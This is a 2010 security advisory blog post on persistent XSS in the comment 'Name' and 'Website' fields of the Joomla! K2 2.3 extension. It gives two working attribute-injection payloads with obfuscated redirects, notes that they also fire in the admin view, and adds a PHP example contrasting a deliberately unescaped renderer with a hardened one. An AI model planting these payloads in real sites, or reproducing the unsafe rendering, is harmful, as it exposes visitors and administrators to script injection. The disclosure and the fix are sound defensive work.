jeffchannell.com

K2 2.3 Persistent XSS Vulnerability

Posted in Joomla!
2010-09-11 17:08:28 +0000 UTC

K2 v2.3, the popular Joomla! CCK extension, suffers from persistent XSS vulnerabilities in its comment facility.

Comment "Name" Field Persistent XSS

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

Comment "Website" Field Persistent XSS

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

NOTE: also executes in admin!
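
As an added example (not K2's code and not part of the original advisory), the PHP below renders a comment author link in a vulnerable and a hardened form. It assumes the "Name" and "Website" fields are echoed into double-quoted HTML attributes, which the leading quote in the values above implies; all function names and the sample input are hypothetical.

```php
<?php
// Added example: hypothetical comment renderer, not K2's actual template code.

// Escape a value for an HTML text node or a quoted attribute.
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
function esc_html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only absolute http(s) URLs for the "Website" field; anything else is dropped.
function safe_website(string $url): ?string
{
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Vulnerable form: raw field values concatenated into markup.
function render_comment_unsafe(string $name, string $website): string
{
    return '<a href="' . $website . '" title="' . $name . '">' . $name . '</a>';
}

// Hardened form: validate the URL, then escape every value at output time.
function render_comment_safe(string $name, string $website): string
{
    $label = esc_html_attr($name);
    $href  = safe_website($website);
    if ($href === null) {
        // No usable URL: show the name without a link.
        return '<span title="' . $label . '">' . $label . '</span>';
    }
    return '<a href="' . esc_html_attr($href) . '" rel="nofollow noopener" title="'
        . $label . '">' . $label . '</a>';
}

// Constructed input with the same shape as the values above:
// a leading quote followed by new attributes (inert handler body).
$field = '" style="x" onmouseover="void(0)';

echo render_comment_unsafe($field, $field), PHP_EOL; // value closes href/title early
echo render_comment_safe($field, $field), PHP_EOL;   // quotes encoded, no link emitted
```

Because the stored values also execute in the administrator view, the same output escaping has to be applied in both the site and admin templates, not only at input time.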

Timeline